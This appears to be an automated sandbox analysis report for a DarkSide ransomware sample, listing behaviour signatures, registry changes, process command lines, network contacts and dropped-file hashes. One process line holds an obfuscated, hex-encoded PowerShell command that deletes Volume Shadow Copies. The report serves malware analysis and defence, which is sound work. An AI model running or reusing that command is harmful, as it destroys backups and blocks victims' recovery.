Analysis Overview
SHA256
2c7d10f64dc39ea9bd6f18d9d1e1204f0c62324e8da148354d557bba17e3c615
Threat Level: Known bad
The file mal.exe was found to be: Known bad.
Malicious Activity Summary
DarkSide
Modifies extensions of user files
Reads user/profile data of web browsers
Sets desktop wallpaper using registry
Enumerates system info in registry
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Modifies Control Panel
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-25 23:22
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-25 23:22
Reported
2022-01-25 23:27
Platform
win7-en-20211208
Max time kernel
189s
Max time network
194s
Command Line
Signatures
DarkSide
Reads user/profile data of web browsers
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.5bede5a3 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.5bede5a3\ = "5bede5a3" | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\5bede5a3\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\5bede5a3 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\5bede5a3\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\5bede5a3.ico" | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\mal.exe
"C:\Users\Admin\AppData\Local\Temp\mal.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7feeeaf4f50,0x7feeeaf4f60,0x7feeeaf4f70
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1048 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1356 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1696 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1976 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1968 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3012 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2368 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3940 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3980 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3852 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3764 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3652 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3676 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3700 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4164 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3800 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4216 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4000 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=764 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3220 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3908 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3340 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2924 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2076 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2124 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2516 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3544 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2972 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2564 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2948 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4116 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3004 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3160 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=792 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3100 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4328 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3456 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4100 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | catsdegree.com | udp |
| US | 72.52.178.23:443 | catsdegree.com | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 142.250.179.206:443 | clients2.google.com | tcp |
| NL | 142.250.179.173:443 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | edgedl.me.gvt1.com | udp |
| US | 34.104.35.123:80 | edgedl.me.gvt1.com | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| NL | 172.217.168.193:443 | clients2.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 8.8.8.8:443 | dns.google | udp |
| NL | 142.250.179.131:443 | ssl.gstatic.com | tcp |
| NL | 142.251.39.110:443 | tcp | |
| NL | 142.251.39.110:443 | tcp | |
| NL | 142.251.39.110:443 | tcp | |
| NL | 142.251.39.110:443 | tcp | |
| NL | 142.251.39.110:443 | tcp | |
| NL | 142.250.179.142:443 | apis.google.com | tcp |
| NL | 31.13.64.35:443 | tcp | |
| NL | 31.13.64.35:443 | tcp | |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 157.240.27.27:443 | tcp | |
| US | 157.240.27.27:443 | tcp | |
| US | 157.240.27.27:443 | tcp | |
| US | 157.240.27.27:443 | tcp | |
| US | 157.240.27.27:443 | tcp | |
| US | 157.240.27.27:443 | tcp | |
| US | 157.240.27.27:443 | tcp | |
| NL | 142.250.179.170:443 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| NL | 142.251.39.110:443 | udp | |
| US | 172.67.204.233:80 | cyberdefenders.org | tcp |
| US | 172.67.204.233:80 | tcp | |
| US | 172.67.204.233:443 | cyberdefenders.org | tcp |
| US | 104.21.78.7:443 | use.fontawesome.com | tcp |
| US | 8.8.8.8:443 | dns.google | udp |
| US | 104.16.18.94:443 | cdnjs.cloudflare.com | tcp |
| NL | 142.250.179.170:443 | udp | |
| NL | 142.250.179.195:443 | update.googleapis.com | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 34.104.35.123:80 | edgedl.me.gvt1.com | tcp |
| US | 104.21.78.7:443 | tcp | |
| NL | 142.250.179.131:443 | beacons.gcp.gvt2.com | tcp |
| NL | 65.9.83.4:443 | tcp | |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| NL | 65.9.83.62:443 | script.hotjar.com | tcp |
| NL | 65.9.83.22:443 | vars.hotjar.com | tcp |
| IE | 52.209.125.250:443 | tcp | |
| IE | 52.17.254.223:443 | tcp | |
| IE | 52.17.254.223:443 | tcp | |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 8.8.8.8:443 | dns.google | tcp |
| NL | 142.250.179.195:443 | udp | |
| US | 151.101.0.176:443 | js.stripe.com | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 151.101.2.132:443 | files.cdn.thinkific.com | tcp |
| NL | 65.9.83.24:443 | m.stripe.network | tcp |
| IE | 52.17.254.223:443 | tcp | |
| US | 34.211.243.235:443 | tcp |
Files
memory/968-54-0x0000000000400000-0x000000000083B000-memory.dmp
memory/968-55-0x00000000002F0000-0x0000000000314000-memory.dmp
memory/968-56-0x0000000000020000-0x0000000000030000-memory.dmp
memory/968-57-0x00000000754B1000-0x00000000754B3000-memory.dmp
memory/968-58-0x0000000000400000-0x000000000083B000-memory.dmp
memory/1652-59-0x000007FEFB571000-0x000007FEFB573000-memory.dmp
memory/1652-61-0x0000000002920000-0x0000000002922000-memory.dmp
memory/1652-62-0x0000000002922000-0x0000000002924000-memory.dmp
memory/1652-63-0x0000000002924000-0x0000000002927000-memory.dmp
memory/1652-60-0x000007FEF2780000-0x000007FEF32DD000-memory.dmp
memory/1652-64-0x000000001B770000-0x000000001BA6F000-memory.dmp
memory/1652-65-0x000000000292B000-0x000000000294A000-memory.dmp
\??\pipe\crashpad_1712_BRJFVGIFYYINHDUG
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\5746a2d4-a368-477c-9a85-6a28ed74cf13.tmp
| MD5 | 068343276d2982c18cbee0c88df9a673 |
| SHA1 | 6ce874c11f1106580fba90d8611894be66de40e6 |
| SHA256 | 9d1b4ab3a16f3f13c52db4fc3440cb181ad5807e4f07e1262d1a992d13bb8a41 |
| SHA512 | be3e17d860cb13babdfe16a8cd9e9983839241c01e48327e969459c871896cdb807df62b07fe892960db5feb8a64e8ea40903e7022b76067fbd9ba7af498b04e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
| MD5 | fe2713936e85049abd4456bf037d5c29 |
| SHA1 | 81ea3f3ebb43d4099e21931522b0cfff51ebb4db |
| SHA256 | 01b16495da4e2fdf784fb84f78214fa96ab058d1e9f9dc1ea66924122f4c2b5c |
| SHA512 | 4fe3bfbd71c92c466182f6a77e078f4085ffe1ee26a3a4f05802ec3b4a92f39ea4ce6f990a555d130ed27ffc53b57b27cd4b7b967c6430252f86205c976e0135 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000005
| MD5 | 70ae354ce421c724f886e84c9e5bdbe6 |
| SHA1 | b1d130a83f58a34c86a18881276adb0181da23e7 |
| SHA256 | 3fba20649c9805c920acacf297d0e2863eff51c3992925374d634c94781119ad |
| SHA512 | ce20d7031a8e5d22839903d2fa9d0f357f2fc91d454c2be1878f461654d3b1623247affd8c29a44d6b6290b98e3933cf2e5b683ff473c38a605cad5281801b22 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000004
| MD5 | c4a85e28db8384c144974acbf425787a |
| SHA1 | c9e5832f263da2f28827e6db70383e976393952d |
| SHA256 | 0efd753008c76eb6ba7206b014cfeb2cc5dc2ea7d134fcd7045ab59f03a34151 |
| SHA512 | 1a1324ff492b1808573ad0a2c4663aae461dcaefe71e80a2d190c19317701a2f3a611493d4342a50ce1e42c37e48a44465eb18294e753d32fac30df2141bce3f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000003
| MD5 | a2a02d1cc5362a1ea22cdd844384b707 |
| SHA1 | 53eb1b1402f6590a05b0049b34a5afe2eb5aae11 |
| SHA256 | 32bf1d779592481ca405b57529b1e5ae5ea2c3ff427d4a54238ca489b6005b72 |
| SHA512 | 96ab950c3555f1c837572d9082315c40f0281a4e54a7a478073ba7142de6e0dd58477c08ece3b1b56fa2ad39482e3dac8f7bce72e1a0a93b05eec86e5356dfda |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000002
| MD5 | 8e6367806dd66a70cb1dccfbfa959d93 |
| SHA1 | 74757af565f685d7ce813bb0601b0e0c69465a7b |
| SHA256 | 97dcb049ad634d583b9f3a5bf8a9528b5e9b73ec00fe3dde65e544a7c5885249 |
| SHA512 | 7024562ae7d105bc54cacec51ccc1fb7f54e300ad9290e4114084ccec8d6978b986f7d66acb95614154bd1fa314372c25df4bf2fb29048f2f9aaaa1610a6eb68 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000002
| MD5 | 22bf0e81636b1b45051b138f48b3d148 |
| SHA1 | 56755d203579ab356e5620ce7e85519ad69d614a |
| SHA256 | e292f241daafc3df90f3e2d339c61c6e2787a0d0739aac764e1ea9bb8544ee97 |
| SHA512 | a4cf1f5c74e0df85dda8750be9070e24e19b8be15c6f22f0c234ef8423ef9ca3db22ba9ef777d64c33e8fd49fada6fcca26c1a14ba18e8472370533a1c65d8d0 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db
| MD5 | 9a8e0fb6cf4941534771c38bb54a76be |
| SHA1 | 92d45ac2cc921f6733e68b454dc171426ec43c1c |
| SHA256 | 9ee9211a57c3f6fa211fe0323fa8cd521e7cbffcd8ff0896645a45795dc472be |
